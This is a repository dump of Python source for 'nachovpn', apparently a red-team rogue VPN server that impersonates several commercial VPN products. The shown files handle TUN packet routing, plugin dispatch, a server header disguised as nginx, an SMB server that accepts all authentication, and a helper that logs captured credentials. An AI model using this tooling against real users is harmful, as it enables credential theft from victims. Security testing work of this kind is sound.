        schedules _handle_reply_packet to route it to the matching client.
        """
        try:
            self.logger.debug("[TUN] _on_tun_ready called")
            # Read packet from TUN interface (one packet per read)
            packet_data = os.read(self.tun_fd, 65535)
            if not packet_data:
                self.logger.debug("[TUN] No data available")
                return
            self.logger.debug(f"[TUN] Raw packet data: {packet_data.hex()}")
            # Get IP version from the high nibble of the first byte
            version = packet_data[0] >> 4
            if version != 4:
                self.logger.debug(f"[TUN] Ignoring non-IPv4 packet: version={version}, first_bytes={packet_data[:4].hex()}")
                return
            # IPv4 packet: header must be at least 20 bytes
            if len(packet_data) >= 20:
                # src at offset 12-16, dst at offset 16-20 of the IPv4 header
                dest_ip = socket.inet_ntoa(packet_data[16:20])
                src_ip = socket.inet_ntoa(packet_data[12:16])
                self.logger.debug(f"[TUN] IPv4 packet: src={src_ip} dst={dest_ip} len={len(packet_data)}")
                if dest_ip:
                    self.logger.debug(f"[TUN] Handling reply packet for dest_ip={dest_ip}, src_ip={src_ip}, len={len(packet_data)}")
                    # Hand off to the async path; this callback must stay fast
                    self._loop.create_task(self._handle_reply_packet(packet_data, dest_ip))
            else:
                self.logger.warning(f"[TUN] Packet too short for IPv4: len={len(packet_data)}")
        except BlockingIOError:
            # No data available
            pass
        except Exception as e:
            self.logger.error(f"[TUN] Error reading from TUN interface: {e}")
    async def _lease_cleanup(self):
        """Periodically check for and reclaim expired client leases.

        Runs forever (until cancelled): every LEASE_CLEANUP_INTERVAL seconds,
        clients idle longer than LEASE_SECS are reclaimed under the client
        lock. Errors are logged and the loop continues.
        """
        while True:
            await asyncio.sleep(LEASE_CLEANUP_INTERVAL)
            try:
                async with self.client_lock:
                    now = time.time()
                    # Find stale clients
                    stale = [
                        ip for ip, client in self.clients.items()
                        if now - client.last_seen > LEASE_SECS
                    ]
                    # Reclaim them
                    for ip in stale:
                        await self._reclaim_client(ip)
            except Exception as e:
                self.logger.error(f"Error in lease cleanup: {e}")
    async def _reclaim_client(self, ip_address):
        """Reclaim a client's resources.

        Removes the client record and its connection mapping, closes its
        socket (best-effort) and returns the IP to the pool. No-op if the
        IP has no registered client. NOTE(review): callers are expected to
        hold self.client_lock — _lease_cleanup does; confirm for new callers.
        """
        try:
            client = self.clients.pop(ip_address, None)
            if client:
                # Remove connection mapping
                self.conn_to_ip.pop(client.connection_id, None)
                # Close the socket (ignore errors on an already-dead socket)
                try:
                    if hasattr(client, 'sock'):
                        client.sock.close()
                except Exception:
                    pass
                # Release the IP back to the pool
                self.ip_pool.release(ip_address)
                self.logger.info(f"Reclaimed idle client {client.connection_id} with IP {ip_address}")
        except Exception as e:
            self.logger.error(f"Error reclaiming client {ip_address}: {e}")
def _send_all_blocking(self, sock, data):
"""Send all bytes on a blocking socket."""
try:
sock.setblocking(True)
sock.sendall(data)
return True
except Exception as e:
self.logger.error(f"Error sending data (blocking): {e}")
return False
    async def _send_packets(self, connection_id, queue):
        """Background task to send packets from queue to client.

        Consumes wrapped packets from *queue* until a None sentinel arrives,
        writing each to the client's socket via a blocking sendall run in an
        executor. Stale lookups (no IP, no client, dead connection) skip the
        packet. A send failure marks the connection dead and destroys the
        session.
        """
        try:
            while True:
                # Get next packet from queue
                packet_data = await queue.get()
                if packet_data is None:  # Shutdown signal
                    break
                # Get client info (connection may have been torn down since
                # the packet was queued)
                ip_address = self.conn_to_ip.get(connection_id)
                if not ip_address:
                    self.logger.warning(f"[TUN] No IP address found for connection_id {connection_id} in _send_packets")
                    continue
                client = self.clients.get(ip_address)
                if not client:
                    self.logger.warning(f"[TUN] No client found for IP {ip_address} in _send_packets")
                    continue
                # Check if connection is still alive
                if not self.connection_states.get(connection_id, False):
                    self.logger.warning(f"[TUN] Connection {connection_id} is no longer alive in _send_packets")
                    continue
                self.logger.debug(f"[TUN] Sending reply packet of size {len(packet_data)} bytes to client {connection_id} (IP {ip_address})")
                try:
                    # Blocking sendall runs in the default executor so the
                    # event loop is not blocked
                    await self._loop.run_in_executor(
                        None,
                        self._send_all_blocking,
                        client.sock,
                        packet_data
                    )
                except Exception as e:
                    self.logger.error(f"[TUN] Failed to send data to client {connection_id}: {e}")
                    self.connection_states[connection_id] = False
                    self.destroy_session(connection_id)
                    break
                # Update client state under lock
                async with self.client_lock:
                    if ip_address in self.clients:
                        self.clients[ip_address].last_seen = time.time()
                        # Touch the IP to keep lease alive
                        self.ip_pool.touch(ip_address)
                        self.logger.debug(f"[TUN] Updated client {connection_id} last_seen time")
                # Mark task as done
                queue.task_done()
        except Exception as e:
            self.logger.error(f"[TUN] Error in send_packets task for {connection_id}: {e}")
            self.connection_states[connection_id] = False
            self.destroy_session(connection_id)
    def register_client(self, connection_id, sock, wrapper_callback):
        """Register a new client and assign an IP.

        Allocates an address from the pool, records the ClientInfo and
        connection mappings, marks the connection alive, and starts the
        per-connection send task with a bounded (100-entry) packet queue.

        Args:
            connection_id: unique identifier for this connection.
            sock: socket used to send wrapped reply packets to the client.
            wrapper_callback: plugin callback applied to reply packets.

        Returns:
            str: the assigned VPN IP address.

        Raises:
            Exception: re-raised after logging (e.g. pool exhaustion).
        """
        try:
            # Allocate IP from pool
            ip_address = self.ip_pool.alloc()
            # Store client info
            self.clients[ip_address] = ClientInfo(
                sock=sock,
                ip_address=ip_address,
                connection_id=connection_id,
                callback=wrapper_callback,
                last_seen=time.time()
            )
            # Add connection mapping
            self.conn_to_ip[connection_id] = ip_address
            # Mark connection as alive
            self.connection_states[connection_id] = True
            # Create packet queue and start send task
            self.packet_queues[connection_id] = asyncio.Queue(maxsize=100)
            self.send_tasks[connection_id] = self._loop.create_task(
                self._send_packets(connection_id, self.packet_queues[connection_id])
            )
            self.logger.info(f"Registered client {connection_id} with IP {ip_address}")
            return ip_address
        except Exception as e:
            self.logger.error(f"Failed to register client {connection_id}: {e}")
            raise
    def destroy_session(self, connection_id):
        """Unregister a client and release their IP.

        Removes all per-connection state (mappings, liveness flag, queue and
        send task) and returns the IP to the pool. No-op when the connection
        is unknown or already destroyed.
        """
        ip_address = self.conn_to_ip.get(connection_id)
        if ip_address and ip_address in self.clients:
            # Remove connection mapping
            self.conn_to_ip.pop(connection_id, None)
            # Remove client info
            del self.clients[ip_address]
            # Remove connection state
            self.connection_states.pop(connection_id, None)
            # Clean up packet queue and send task
            queue = self.packet_queues.pop(connection_id, None)
            if queue:
                # Signal task to stop (None is the shutdown sentinel;
                # scheduled thread-safely since this may run off-loop)
                self._loop.call_soon_threadsafe(queue.put_nowait, None)
            task = self.send_tasks.pop(connection_id, None)
            if task:
                task.cancel()
            # Release the IP
            self.ip_pool.release(ip_address)
            self.logger.info(f"Unregistered client {connection_id}")
    async def _handle_reply_packet(self, packet_data, dest_ip):
        """Handle a reply packet from the TUN interface.

        Looks up the client owning *dest_ip*, wraps the raw IP packet via the
        client's plugin callback (or passes it through unchanged), and queues
        it on the client's send queue. Packets for dead connections, unknown
        clients, or full queues are dropped with a log message.
        """
        try:
            # Lookup client by IP
            client = self.clients.get(dest_ip)
            self.logger.debug(f"[TUN] Handling reply packet for dest_ip={dest_ip}, client={client}")
            if client:
                # Check if connection is still alive
                if not self.connection_states.get(client.connection_id, False):
                    self.logger.warning(f"[TUN] Connection {client.connection_id} is no longer alive, skipping packet")
                    return
                # Use the plugin's wrapper_callback when present
                if client.callback:
                    self.logger.debug(f"[TUN] Using callback for client {client.connection_id}")
                    wrapped_data = client.callback(packet_data, client)
                else:
                    self.logger.debug(f"[TUN] No callback for client {client.connection_id}, using raw data")
                    wrapped_data = packet_data
                # Add packet to queue (non-blocking; full queue drops)
                self.logger.debug(f"[TUN] Queuing reply packet to client {client.connection_id} (IP {dest_ip}): original size={len(packet_data)}, wrapped size={len(wrapped_data)}")
                queue = self.packet_queues.get(client.connection_id)
                if queue:
                    try:
                        queue.put_nowait(wrapped_data)
                        self.logger.debug(f"[TUN] Queued reply packet to client {client.connection_id}")
                    except asyncio.QueueFull:
                        self.logger.warning(f"[TUN] Client {client.connection_id} queue full, dropping packet")
                else:
                    self.logger.warning(f"[TUN] No queue found for client {client.connection_id}")
            else:
                self.logger.warning(f"[TUN] No client found for destination IP {dest_ip}")
        except Exception as e:
            self.logger.error(f"[TUN] Error handling reply packet: {e}")
    def handle_client_packet(self, packet_data, connection_id):
        """Handle a packet from a client.

        Refreshes the client's lease, writes the raw IP packet to the TUN
        device when tunneling is enabled (otherwise just logs it), and
        appends it to the PCAP capture when configured.

        Args:
            packet_data: raw IP packet bytes (already unwrapped by the plugin).
            connection_id: identifier of the sending client connection.
        """
        try:
            self.logger.debug(f"Handling client packet for connection_id {connection_id}")
            ip_address = self.conn_to_ip.get(connection_id)
            if not ip_address:
                self.logger.error(f"No client found for connection_id {connection_id}")
                return
            client_info = self.clients.get(ip_address)
            if not client_info:
                self.logger.error(f"No ClientInfo found for IP {ip_address}")
                return
            # Extract src/dst for logging, only for well-formed IPv4 packets
            src_ip = socket.inet_ntoa(packet_data[12:16]) if len(packet_data) >= 16 and (packet_data[0] >> 4) == 4 else None
            dst_ip = socket.inet_ntoa(packet_data[16:20]) if len(packet_data) >= 20 and (packet_data[0] >> 4) == 4 else None
            self.logger.debug(f"[Client] Packet: src={src_ip} dst={dst_ip} len={len(packet_data)}")
            # Update last seen time (scheduled on the handler's event loop
            # so the lock is acquired there)
            async def update_client():
                async with self.client_lock:
                    if ip_address in self.clients:
                        self.clients[ip_address].last_seen = time.time()
            self._loop.create_task(update_client())
            if TUNNEL_ENABLED:
                # Write packet to TUN interface
                if self.tun_fd is not None:
                    try:
                        bytes_written = os.write(self.tun_fd, packet_data)
                        self.logger.debug(f"[TUN] Wrote {bytes_written} bytes to TUN interface")
                    except BlockingIOError:
                        # TUN queue is full, drop the packet
                        self.logger.warning("TUN queue full, dropping packet")
                    except Exception as e:
                        self.logger.error(f"Error writing to TUN interface: {e}")
                        self.logger.error("Stack trace:", exc_info=True)
                else:
                    self.logger.error("TUN file descriptor not available")
            else:
                self.logger.debug(f"[TUN] Tunnel disabled. Received packet from {src_ip} to {dst_ip}")
            self.append_to_pcap(packet_data)
        except Exception as e:
            self.logger.error(f"Error handling client packet: {e}")
def append_to_pcap(self, packet):
"""Append packet to PCAP file if enabled"""
try:
if self.write_pcap and self._pcap_writer is not None:
pkt = self._fake_eth / Raw(load=bytes(packet))
self._pcap_writer.write(pkt)
except Exception as e:
self.logger.error(f'Error appending to PCAP: {e}')
    async def close(self):
        """Clean up resources.

        Idempotent (guarded by self._closed). Cancels the lease-cleanup task,
        closes all client sockets, tears down the TUN fd and nftables rules
        when tunneling was enabled, and closes the IPRoute handle and PCAP
        writer. Individual failures are logged; a failure in the overall
        sequence is re-raised.
        """
        if self._closed:
            return
        try:
            # Cancel background tasks and wait for them to finish
            if TUNNEL_ENABLED and hasattr(self, '_lease_cleanup_task'):
                self._lease_cleanup_task.cancel()
                try:
                    await self._lease_cleanup_task
                except asyncio.CancelledError:
                    pass
            # Close all client connections
            async with self.client_lock:
                for client in list(self.clients.values()):
                    try:
                        if hasattr(client, 'sock'):
                            client.sock.close()
                    except Exception:
                        pass
                self.clients.clear()
                self.conn_to_ip.clear()
            # Clean up tunneling resources
            if TUNNEL_ENABLED:
                # Remove TUN fd from event loop
                if self.tun_fd is not None:
                    try:
                        self._loop.remove_reader(self.tun_fd)
                        self.logger.info("Removed TUN fd from event loop")
                    except Exception as e:
                        self.logger.error(f"Error removing TUN fd from event loop: {e}")
                # Close TUN file descriptor
                if self.tun_fd is not None:
                    try:
                        os.close(self.tun_fd)
                        self.logger.info("Closed TUN file descriptor")
                    except Exception as e:
                        self.logger.error(f"Error closing TUN file descriptor: {e}")
                # Remove our nftables table entirely
                try:
                    self.nft.cmd('flush table inet vpn')
                    self.nft.cmd('delete table inet vpn')
                    self.logger.info("Cleaned up nftables rules")
                except Exception as e:
                    self.logger.error(f"Error cleaning up nftables: {e}")
            # Close IPRoute
            if hasattr(self, '_ipr'):
                try:
                    await self._ipr.close()
                    self.logger.info("Closed IPRoute")
                except Exception as e:
                    self.logger.error(f"Error closing IPRoute: {e}")
            # Close PCAP writer
            if self._pcap_writer is not None:
                try:
                    self._pcap_writer.close()
                    self.logger.info("Closed PCAP writer")
                except Exception as e:
                    self.logger.error(f"Error closing PCAP writer: {e}")
            self._closed = True
            self.logger.info("PacketHandler closed successfully")
        except Exception as e:
            self.logger.error(f"Error in cleanup: {e}")
            raise
def create_session(self, sock, wrapper_callback):
    """Open a new client session.

    Generates a fresh connection id, registers the client (which assigns a
    tunnel IP), and returns the (connection_id, ip_address) pair.
    """
    new_id = str(uuid.uuid4())
    assigned_ip = self.register_client(new_id, sock, wrapper_callback)
    return new_id, assigned_ip
def get_assigned_ip(self, connection_id):
    """Look up the tunnel IP assigned to a connection id; None when unknown."""
    mapping = self.conn_to_ip
    return mapping.get(connection_id, None)
def assign_socket(self, connection_id, sock):
    """Attach (or replace) the socket on an existing client session.

    Returns True when the connection id maps to a registered client,
    False (with a warning) otherwise.
    """
    ip_address = self.conn_to_ip.get(connection_id)
    if not ip_address or ip_address not in self.clients:
        self.logger.warning(f"assign_socket: No client found for connection_id {connection_id}")
        return False
    self.logger.info(f"Assigning new socket to connection_id {connection_id} (IP {ip_address})")
    self.clients[ip_address].sock = sock
    return True
async def start(self):
    """Start the packet handler's background tasks.

    Binds the running event loop, then (when tunneling is enabled) sets up
    nftables, the TUN interface/fd, and the lease-cleanup task. Finally
    opens the PCAP writer when capture is configured. Errors are logged
    and re-raised so the caller can abort startup.
    """
    try:
        # Set the event loop for this thread
        self._loop = asyncio.get_running_loop()
        self.logger.info(f"[TUN] PacketHandler using event loop {self._loop} in thread {threading.current_thread().name}")

        # Log the tunnel configuration
        self.logger.info(f"Tunnel configuration: TUNNEL_PRIVATE={TUNNEL_PRIVATE}, TUNNEL_FULL={TUNNEL_FULL}")

        if TUNNEL_ENABLED:
            # Initialize nftables
            self._setup_nftables()

            # Set up TUN interface
            await self._setup_tun_interface()

            # Set up TUN file descriptor
            self._setup_tun_fd()

            # Start background tasks (guard keeps start() idempotent)
            if self._lease_cleanup_task is None:
                self._lease_cleanup_task = asyncio.create_task(self._lease_cleanup())
                self.logger.info("Started lease cleanup task")
        else:
            self.logger.info("Tunnel disabled - skipping nftables, TUN interface, and lease cleanup setup")

        # Set up PCAP writer (always enabled if configured)
        if self.write_pcap and self.pcap_filename:
            # BUGFIX: os.makedirs('') raises FileNotFoundError when the
            # filename has no directory component — only create the parent
            # directory when one is actually present.
            pcap_dir = os.path.dirname(self.pcap_filename)
            if pcap_dir:
                os.makedirs(pcap_dir, exist_ok=True)
            self._fake_eth = Ether(src='01:02:03:04:05:06', dst='ff:ff:ff:ff:ff:ff')
            self.logger.info(f"Using TUN interface MAC {self._fake_eth.src} for PCAP")

            # Open PCAP writer
            self._pcap_writer = PcapWriter(self.pcap_filename, append=True)
            self.logger.info(f"Opened PCAP writer for {self.pcap_filename}")
    except Exception as e:
        self.logger.error(f"Error starting packet handler: {e}")
        raise
================================================
FILE: src/nachovpn/core/plugin_manager.py
================================================
import logging
import traceback
import os
import asyncio
class PluginManager:
    """Registry of VPN plugins; dispatches raw data and HTTP requests to them."""

    def __init__(self, loop=None):
        # Plugins are tried in registration order by the handle_* methods.
        self.plugins = []
        self.loop = loop or asyncio.get_event_loop()

    def register_plugin(self, plugin_class, **kwargs):
        """Register a plugin"""
        disabled = os.getenv("DISABLED_PLUGINS", "").split(",")
        if plugin_class.__name__ in disabled:
            logging.info(f"Skipping disabled plugin: {plugin_class.__name__}")
            return
        instance = plugin_class(**kwargs)
        self.plugins.append(instance)
        logging.info(f"Registered plugin: {plugin_class.__name__}")

    def handle_data(self, data, client_socket, client_ip):
        """Try each plugin to handle raw VPN data"""
        for plugin in self.plugins:
            try:
                if not plugin.is_enabled():
                    continue
                if plugin.can_handle_data(data, client_socket, client_ip):
                    return plugin.handle_data(data, client_socket, client_ip)
            except Exception as e:
                logging.error(f"Error in plugin {plugin.__class__.__name__}: {e}")
                logging.error(traceback.format_exc())
        return False

    def handle_http(self, handler):
        """Try each plugin to handle HTTP requests"""
        for plugin in self.plugins:
            try:
                if not plugin.is_enabled():
                    continue
                if plugin.can_handle_http(handler):
                    # Record which plugin served the request for log tagging.
                    handler.plugin_name = plugin.__class__.__name__
                    return plugin.handle_http(handler)
            except Exception as e:
                logging.error(f"Error in plugin {plugin.__class__.__name__}: {e}")
                logging.error(traceback.format_exc())
        return False
================================================
FILE: src/nachovpn/core/request_handler.py
================================================
from http.server import BaseHTTPRequestHandler
import logging
import os
class VPNStreamRequestHandler(BaseHTTPRequestHandler):
    """Connection dispatcher: peeks at the first line of each connection and
    routes HTTP-looking traffic to HTTP plugins, everything else to raw-data
    plugins, via the server's PluginManager."""

    def __init__(self, request, client_address, server):
        # Grab the shared PluginManager before calling the base __init__,
        # which immediately runs handle() on the request.
        self.plugin_manager = server.plugin_manager
        super().__init__(request, client_address, server)

    def send_header(self, keyword, value):
        # Mask the real server identity on every outgoing response.
        if keyword.lower() == 'server':
            value = "nginx"
        super().send_header(keyword, value)

    def handle(self):
        """Read the first line and dispatch the connection.

        HTTP requests are parsed and offered to plugins; unhandled ones get
        the bundled 404 page. Non-HTTP first lines are passed as raw bytes
        to data plugins, then the connection is closed.
        """
        try:
            first_line = self.rfile.readline()
            if b'HTTP/' in first_line:
                # Parse the HTTP request line and headers.
                # parse_request() reads the remaining headers from rfile and
                # populates self.command/self.path/self.headers.
                self.raw_requestline = first_line
                if self.parse_request():
                    # Delegate HTTP processing to PluginManager
                    if self.server.plugin_manager.handle_http(self):
                        return
                    # No plugin handled the request, send 404
                    logging.warning(f"Unhandled HTTP request from {self.client_address[0]}")
                    with open(os.path.join(os.path.dirname(__file__), '..',
                            'plugins', 'base', 'templates', '404.html'), 'rb') as f:
                        self.send_response(404)
                        self.send_header('Content-Type', 'text/html')
                        self.end_headers()
                        self.wfile.write(f.read())
            else:
                # Handle raw VPN data: pass the bytes (and the live socket,
                # so a plugin can keep talking) to data plugins.
                if not self.server.plugin_manager.handle_data(first_line, self.connection, self.client_address[0]):
                    logging.warning(f"Unhandled raw VPN data from {self.client_address[0]}: {first_line}")
                self.connection.close()
        except Exception as e:
            logging.error(f"Error processing request from {self.client_address[0]}: {e}")
            self.connection.close()

    def log_message(self, format, *args):
        # Tag log lines with the plugin that served the request, when known.
        plugin_name = getattr(self, 'plugin_name', 'Default')
        logging.info(f"[{plugin_name}] {self.client_address[0]} - - {format % args}")
================================================
FILE: src/nachovpn/core/smb_manager.py
================================================
from impacket.smbserver import SimpleSMBServer
import os
import stat
import logging
import threading
# SMB configuration (read once at import time from the environment)
# SMB_ENABLED gates whether SMBManager starts a server at all.
SMB_ENABLED = os.getenv("SMB_ENABLED", "false").lower() == "true"
# Name of the exported share and the local directory backing it.
SMB_SHARE_NAME = os.getenv("SMB_SHARE_NAME", "SHARE")
SMB_SHARE_PATH = os.getenv("SMB_SHARE_PATH", "smb")
class SMBManager:
    """Hosts an optional read-only SMB share via impacket's SimpleSMBServer."""

    def __init__(self):
        self.logger = logging.getLogger(__name__)
        self.server = None
        if SMB_ENABLED:
            self._setup_smb_server()

    def auth_callback(self, *args, **kwargs):
        """Authentication callback"""
        # Accept every authentication attempt; log what the client sent.
        self.logger.debug(f"Authenticate message: {args} {kwargs}")
        return True

    def _setup_smb_server(self):
        """Set up the SMB server"""
        try:
            # Create share directory if it doesn't exist
            os.makedirs(SMB_SHARE_PATH, exist_ok=True)

            # Impacket's readOnly flag is not implemented, so make the directory read-only
            os.chmod(SMB_SHARE_PATH, stat.S_IREAD | stat.S_IEXEC)

            # Build and configure the server before exposing it on self
            smb = SimpleSMBServer("0.0.0.0", 445)
            smb.addShare(SMB_SHARE_NAME.upper(), SMB_SHARE_PATH, shareComment='Nacho SMB Share', readOnly='yes')
            smb.setSMB2Support(True)
            self.server = smb

            # Run the listener on a daemon thread so it never blocks shutdown
            threading.Thread(target=smb.start, daemon=True).start()
            self.logger.info(f"Started SMB server with share '{SMB_SHARE_NAME}' at {SMB_SHARE_PATH}")
        except Exception as e:
            self.logger.error(f"Failed to start SMB server: {e}")
            self.server = None
================================================
FILE: src/nachovpn/core/utils.py
================================================
from scapy.all import IP, IPv6, ARP, UDP, TCP, Ether, rdpcap, wrpcap, \
srp, sendp, conf, get_if_addr, get_if_hwaddr, getmacbyip, sniff
import os
import logging
class PacketHandler:
    """
    TODO: Implement a NAT-based packet handler where the plugin provides a callback function
    that is called when a packet is received back from its destination and written to the client tunnel.
    """
    def __init__(self, write_pcap=False, pcap_filename=None, logger_name="PacketHandler", receive_callback=None):
        """Create the handler.

        write_pcap/pcap_filename control optional packet capture;
        receive_callback (new, defaults to None for backward compatibility)
        is invoked by packet_sniffer for each captured IP packet — it was
        previously read but never initialized, causing AttributeError.
        """
        self.write_pcap = write_pcap
        self.pcap_filename = pcap_filename
        self.logger = logging.getLogger(logger_name)
        self.receive_callback = receive_callback
        if self.write_pcap and pcap_filename is not None:
            # BUGFIX: os.makedirs('') raises when the filename has no
            # directory component; only create the parent if one exists.
            pcap_dir = os.path.dirname(pcap_filename)
            if pcap_dir:
                os.makedirs(pcap_dir, exist_ok=True)

    def get_free_nat_port(self):
        """Return a NAT source port. Placeholder: always 0 (TODO: allocate)."""
        return 0

    def forward_tcp_packet(self, packet_data):
        """NAT-rewrite a client's TCP packet and send it out the default iface.

        Accepts raw IP packet bytes. Fixes from review: the original body
        referenced an undefined name `packet` (never parsed packet_data,
        guaranteed NameError) and duplicated the NAT-rewrite statements.
        """
        packet = IP(packet_data)
        src_ip = packet[IP].src
        dst_ip = packet[IP].dst
        sport = packet[TCP].sport
        dport = packet[TCP].dport
        self.logger.debug(f"Processing TCP packet: {src_ip}:{sport} -> {dst_ip}:{dport}")

        # Get a unique NAT port for this connection
        nat_port = self.get_free_nat_port()
        self.logger.debug(f"New connection: {src_ip}:{sport} -> {dst_ip}:{dport} (NAT port: {nat_port})")

        # Modify packet for NAT
        packet[IP].src = get_if_addr(conf.iface)  # Replace source IP with our IP
        packet[TCP].sport = nat_port              # Replace source port with NAT port

        # Recalculate checksums (scapy recomputes deleted checksums on send)
        del packet[IP].chksum
        del packet[TCP].chksum

        # Send the packet out
        sendp(packet, verbose=False, iface=conf.iface)

    def packet_sniffer(self):
        """Blocking sniffer loop: forward each captured IP packet to
        self.receive_callback (if set). Runs until sniff() returns."""
        def packet_callback(packet):
            try:
                if IP not in packet:
                    return
                # TODO: restore original IP and TCP ports
                if self.receive_callback:
                    self.receive_callback(packet)
            except Exception as e:
                self.logger.error(f"Error processing packet: {e}")

        self.logger.info('Starting packet sniffer')
        sniff(iface=conf.iface, prn=packet_callback, store=False)

    def handle_client_packet(self, packet_data):
        """Parse raw IP bytes from a client and record them to the PCAP."""
        packet = IP(packet_data)
        self.logger.info(f"Received packet: {packet}")
        self.append_to_pcap(packet)

    def append_to_pcap(self, packet):
        """Append a packet to the capture file, adding a fake L2 header if needed."""
        try:
            if self.write_pcap and self.pcap_filename is not None:
                # Add fake layer 2 data to the packet, if missing
                if not packet.haslayer(Ether):
                    src_mac = get_if_hwaddr(conf.iface)
                    packet = Ether(src=src_mac, dst=None) / packet
                wrpcap(self.pcap_filename, packet, append=True)
        except Exception as e:
            # Use the instance logger for consistency with the rest of the class
            self.logger.error(f'Error appending to PCAP: {e}')
================================================
FILE: src/nachovpn/plugins/__init__.py
================================================
# Plugin package surface: re-export every bundled plugin class so callers
# can import them all from nachovpn.plugins.
from nachovpn.plugins.base.plugin import VPNPlugin
from nachovpn.plugins.paloalto.plugin import PaloAltoPlugin
from nachovpn.plugins.cisco.plugin import CiscoPlugin
from nachovpn.plugins.sonicwall.plugin import SonicWallPlugin
from nachovpn.plugins.pulse.plugin import PulseSecurePlugin
from nachovpn.plugins.netskope.plugin import NetskopePlugin
from nachovpn.plugins.delinea.plugin import DelineaPlugin
from nachovpn.plugins.example.plugin import ExamplePlugin

# Names exported by `from nachovpn.plugins import *`.
__all__ = [
    'VPNPlugin',
    'PaloAltoPlugin',
    'CiscoPlugin',
    'SonicWallPlugin',
    'PulseSecurePlugin',
    'NetskopePlugin',
    'DelineaPlugin',
    'ExamplePlugin'
]
================================================
FILE: src/nachovpn/plugins/base/__init__.py
================================================
================================================
FILE: src/nachovpn/plugins/base/plugin.py
================================================
from flask import Flask, jsonify
from jinja2 import Environment, FileSystemLoader
import logging
import os
class VPNPlugin:
    """Base class for all VPN plugins.

    Owns a per-plugin Flask app (HTTP requests received by the stream
    handler are replayed into it via test_client) and a Jinja2 environment
    for rendering templates. Subclasses override the can_handle_* /
    handle_* hooks to claim and serve traffic.
    """

    def __init__(self, cert_manager=None, external_ip=None, dns_name=None, db_manager=None, template_dir=None, packet_handler=None, **kwargs):
        self.enabled = True
        self.cert_manager = cert_manager
        self.external_ip = external_ip
        self.dns_name = dns_name
        self.db_manager = db_manager
        self.template_dir = template_dir
        self.packet_handler = packet_handler
        self.logger = logging.getLogger(self.__class__.__name__)
        # setup Flask app
        self.flask_app = Flask(__name__)
        self._setup_routes()
        # Set up Jinja2 environment if template_dir is provided;
        # the base templates directory is always searched as a fallback.
        default_dir = os.path.join(os.path.dirname(__file__), 'templates')
        if template_dir:
            self.template_env = Environment(loader=FileSystemLoader([template_dir, default_dir]))
        else:
            self.template_env = Environment(loader=FileSystemLoader(default_dir))

    def is_enabled(self):
        # Queried by PluginManager before offering traffic to this plugin.
        return self.enabled

    def get_thumbprint(self):
        """Return the server certificate thumbprint, preferring a live probe
        of self.dns_name when USE_DYNAMIC_SERVER_THUMBPRINT=true."""
        thumbprint = self.cert_manager.server_thumbprint
        if os.getenv('USE_DYNAMIC_SERVER_THUMBPRINT', 'false').lower() == 'true':
            dynamic_thumbprint = self.cert_manager.get_thumbprint_from_server(self.dns_name)
            if dynamic_thumbprint:
                self.logger.debug(f"Using dynamic thumbprint for {self.dns_name}: {dynamic_thumbprint}")
                thumbprint = dynamic_thumbprint
        return thumbprint

    def _setup_routes(self):
        # Define Flask routes within the class
        @self.flask_app.route('/api/v1/healthcheck', methods=['GET'])
        def healthcheck():
            return jsonify({"message": "OK"})

        @self.flask_app.errorhandler(404)
        def page_not_found(e):
            return self.render_template('404.html'), 404

    def _send_flask_response(self, response, handler):
        # Send the Flask response back to the client, copying status,
        # headers, and body onto the raw HTTP handler.
        handler.send_response(response.status_code)
        for header, value in response.headers:
            handler.send_header(header, value)
        handler.end_headers()
        handler.wfile.write(response.data)

    def handle_get(self, handler):
        """Replay a GET request into the Flask app and relay the response."""
        with self.flask_app.test_client() as client:
            response = client.get(handler.path, headers=dict(handler.headers))
        self._send_flask_response(response, handler)
        return True

    def handle_post(self, handler):
        """Replay a POST request (body included) into the Flask app."""
        content_length = int(handler.headers.get('Content-Length', 0))
        body = handler.rfile.read(content_length)
        # Use Flask's test_client to handle the request
        with self.flask_app.test_client() as client:
            response = client.post(handler.path, data=body, headers=dict(handler.headers))
        self._send_flask_response(response, handler)
        return True

    def render_template(self, template_name, **context):
        """Render a template with the given context"""
        if not hasattr(self, 'template_env'):
            raise Exception("No template environment configured")
        template = self.template_env.get_template(template_name)
        return template.render(**context)

    def can_handle_data(self, data, client_socket, client_ip):
        """Check if this plugin can handle the given data"""
        # Base class claims nothing; subclasses override.
        return False

    def can_handle_http(self, handler):
        """Determine if this plugin can handle the HTTP request"""
        # Base class claims nothing; subclasses override.
        return False

    def handle_data(self, data, client_socket, client_ip):
        # Raw-data hook; base implementation handles nothing.
        return False

    def handle_http(self, handler):
        # Route by HTTP verb; other methods are left unhandled (False).
        if handler.command == 'GET':
            return self.handle_get(handler)
        elif handler.command == 'POST':
            return self.handle_post(handler)
        return False

    def log_credentials(self, username, password, other_data=None):
        """Helper method to log credentials to the database."""
        if self.db_manager:
            self.db_manager.log_credentials(
                username=username,
                password=password,
                plugin_name=self.__class__.__name__,
                other_data=other_data
            )

    def _wrap_packet(self, packet_data, client):
        """Wrap the packet data with the plugin's specific protocol."""
        # Identity by default; protocol plugins override to add framing.
        return packet_data
================================================
FILE: src/nachovpn/plugins/base/templates/404.html
================================================
404 Not Found